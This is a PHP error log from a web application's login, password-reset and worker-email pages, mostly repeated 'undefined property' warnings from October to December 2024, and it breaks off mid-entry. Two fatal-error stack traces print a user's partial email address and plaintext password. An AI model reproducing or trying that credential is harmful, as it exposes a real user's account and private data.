PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:41:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:41:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:52:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:58:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 03:39:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 04:42:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 05:27:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 07:36:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 08:07:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 08:41:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 08:47:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 09:30:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 10:37:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Oct-2024 07:40:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Oct-2024 07:40:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Oct-2024 03:58:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Oct-2024 21:37:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Oct-2024 21:53:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 00:23:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 00:51:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 00:53:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 01:20:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 01:26:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 01:56:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:15:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:39:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:39:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 02:43:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 06:37:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 09:11:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 12:25:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 12:25:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 21:12:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Oct-2024 23:14:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 00:01:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 00:14:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 00:52:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 01:49:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 04:05:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Oct-2024 23:26:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 01:10:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 01:30:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 03:54:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Oct-2024 04:27:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Oct-2024 00:54:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Oct-2024 00:05:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 01:00:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:10:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:31:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:33:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 05:34:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Oct-2024 23:36:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Oct-2024 01:24:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:09:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:16:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:48:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Oct-2024 04:49:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [21-Oct-2024 04:56:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 03:25:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:52:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:54:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:58:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Oct-2024 06:59:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Oct-2024 23:49:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Oct-2024 00:26:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Oct-2024 01:32:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 13:56:14 UTC] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /home/emeraadmin/public_html/Classes/Database.php:51 Stack trace: #0 /home/emeraadmin/public_html/Service/UserService.php(17): Database->query('SELECT id, emai...') #1 /home/emeraadmin/public_html/pages/authenticateuser.php(12): UserService->login('pavithrahatsin@...', '123456') #2 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 51 [06-Nov-2024 13:58:07 UTC] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /home/emeraadmin/public_html/Classes/Database.php:51 Stack trace: #0 /home/emeraadmin/public_html/Service/UserService.php(17): Database->query('SELECT id, emai...') #1 /home/emeraadmin/public_html/pages/authenticateuser.php(12): UserService->login('pavithrahatsin@...', '123456') #2 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 51 [06-Nov-2024 13:59:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:05:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:11:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:11:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 14:21:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Nov-2024 23:23:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 00:51:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 03:09:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 03:11:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Nov-2024 17:08:38 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [08-Nov-2024 04:01:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Nov-2024 09:45:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Nov-2024 01:34:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Nov-2024 23:56:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:13:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:20:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:20:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:21:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:24:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:26:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:28:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:31:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Nov-2024 00:38:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Nov-2024 00:42:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:43:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:44:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 00:50:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:36:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:37:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:39:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:40:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Nov-2024 03:41:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Nov-2024 11:27:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [01-Dec-2024 23:51:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:28:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:28:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:29:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:29:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:29:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 04:30:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 06:05:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 06:07:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Dec-2024 06:08:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:18:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:25:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:29:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Dec-2024 08:39:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 04:38:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 04:38:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 07:22:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 10:30:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 11:08:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 11:09:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 11:09:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 12:15:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 12:29:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 13:10:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Dec-2024 13:24:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:20:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:31:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:41:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:43:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 00:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Dec-2024 05:31:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Dec-2024 09:57:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Dec-2024 10:00:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Dec-2024 10:00:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 05:44:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 07:32:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:54:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:55:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:55:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 14:55:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 22:39:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 22:59:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Dec-2024 23:02:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:02:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:03:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Dec-2024 23:34:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 00:26:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 01:22:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 02:49:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 09:29:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 10:37:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 21:55:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 22:08:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 22:09:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 22:57:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:14:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:32:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:40:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Dec-2024 23:46:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Dec-2024 00:45:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Dec-2024 10:35:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Dec-2024 22:29:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 06:35:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 21:56:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 22:25:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 23:11:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Dec-2024 23:26:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:29:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:33:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:39:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:42:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:48:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 00:54:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:07:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:07:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:08:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:21:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 01:21:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 03:29:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Dec-2024 04:08:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Dec-2024 16:24:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Dec-2024 22:53:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 04:10:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 06:18:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 07:19:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Dec-2024 09:43:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 00:42:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 00:44:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Dec-2024 08:14:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 08:58:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 09:09:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Dec-2024 13:56:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 14:27:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 14:53:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:06:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:50:09 UTC] PHP Warning: Undefined property: stdClass::$status in 